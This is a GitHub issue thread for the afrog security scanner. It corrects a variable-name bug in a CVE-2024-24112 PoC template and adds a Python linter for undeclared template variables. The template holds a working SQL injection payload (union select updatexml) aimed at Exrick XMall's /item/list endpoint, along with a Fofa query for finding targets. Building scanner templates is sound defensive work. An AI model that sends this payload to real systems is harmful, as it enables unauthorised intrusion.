zan8in / afrog

A Security Tool for Bug Bounty, Pentest and Red Teaming.
MIT License

CVE-2024-24112 PoC is incorrect #110

Closed scarleast closed 8 months ago

scarleast commented 8 months ago

In the expression, the variable passed to md5 should be randstr; in the PoC it is rand.

id: CVE-2024-24112

info:
  name: Exrick XMall open-source mall SQL injection vulnerability
  author: zan8in
  severity: high
  verified: true
  description: |-
    Fofa: app="XMall-后台管理系统"
  reference:
    - https://mp.weixin.qq.com/s/HqVQrUr6iRv94BmrVd_gOw
  tags: cve,cve2024,sqli
  created: 2024/02/21

set:
  randstr: randomInt(200000000, 210000000)
rules:
  r0:
    request:
      method: GET
      path: /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,md5({{randstr}}),0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1679041197136
    expression: response.status == 200 && response.body.bcontains(bytes(md5(string(randstr))))
expression: r0()
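
The mismatch reported above (a `set:` variable named one way, the `expression:` hashing a name that was never declared) is mechanical enough to catch before a template ships. The following is an added example, not code from the issue or from afrog itself: a small Python linter that collects the names declared under `set:` and compares them against the identifiers referenced in `{{...}}` placeholders and `expression:` lines. It uses a line-oriented scan of the afrog PoC layout rather than a YAML library, the `BUILTIN_NAMES` set is an assumption about which names afrog's expression language provides on its own, and the two sample templates are constructed here from the PoC in the issue (one as posted, one with the `rand` mismatch the reporter describes).

```python
import re

# Names afrog's expression language provides without a `set:` entry.
# This list is an assumption made for the linter, not afrog's own definition.
BUILTIN_NAMES = {"response", "request", "true", "false", "nil"}

# A bare identifier: not preceded by a word char or '.', and not followed by
# '(' (so md5(...), string(...), bytes(...) and r0() are treated as calls,
# and response.status / .body / .bcontains as field or method accesses).
IDENT_RE = re.compile(r"(?<![\w.])([A-Za-z_]\w*)\b(?!\s*\()")
# {{name}} placeholders rendered into request paths, headers or bodies.
TEMPLATE_RE = re.compile(r"\{\{\s*([A-Za-z_]\w*)\s*\}\}")


def set_variables(poc_text):
    """Return the names declared under the top-level `set:` block.

    Line-oriented scan of the afrog PoC layout: top-level keys sit at
    indent 0, variables are indented beneath `set:`.
    """
    names = set()
    in_set = False
    for line in poc_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if len(line) == len(line.lstrip()):      # top-level key
            in_set = line.rstrip() == "set:"
            continue
        if in_set:
            m = re.match(r"\s*([A-Za-z_]\w*)\s*:", line)
            if m:
                names.add(m.group(1))
    return names


def referenced_variables(poc_text):
    """Return every variable name used in `expression:` lines or {{...}} placeholders."""
    refs = set(TEMPLATE_RE.findall(poc_text))
    for line in poc_text.splitlines():
        m = re.match(r"\s*expression:\s*(.*)$", line)
        if m:
            refs.update(i for i in IDENT_RE.findall(m.group(1)) if i not in BUILTIN_NAMES)
    return refs


def lint_afrog_poc(poc_text):
    """Sorted list of variables that are referenced but never declared in `set:`."""
    return sorted(referenced_variables(poc_text) - set_variables(poc_text))


# Constructed sample: the template from the issue, with the `info:` block
# dropped since the linter does not look at it. Path and expression both
# use randstr, so nothing is undefined.
FIXED_POC = """\
id: CVE-2024-24112

set:
  randstr: randomInt(200000000, 210000000)
rules:
  r0:
    request:
      method: GET
      path: /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,md5({{randstr}}),0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1679041197136
    expression: response.status == 200 && response.body.bcontains(bytes(md5(string(randstr))))
expression: r0()
"""

# Constructed sample of the mismatch the reporter describes: the expression
# hashes `rand`, which `set:` never declares, so the check can never match.
BUGGY_POC = FIXED_POC.replace("md5(string(randstr))", "md5(string(rand))")

if __name__ == "__main__":
    for label, poc in (("fixed", FIXED_POC), ("buggy", BUGGY_POC)):
        print(label, "undefined variables:", lint_afrog_poc(poc))
```

Against the template as posted the linter returns an empty list; against the `rand` variant it returns `['rand']`, which is the defect this issue reports. The same pass over a directory of PoC files is a cheap pre-commit check, since an undeclared variable in the `expression:` only shows up at scan time as a rule that silently never fires.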
zan8in commented 8 months ago

Thanks, fixed and pushed to GitHub.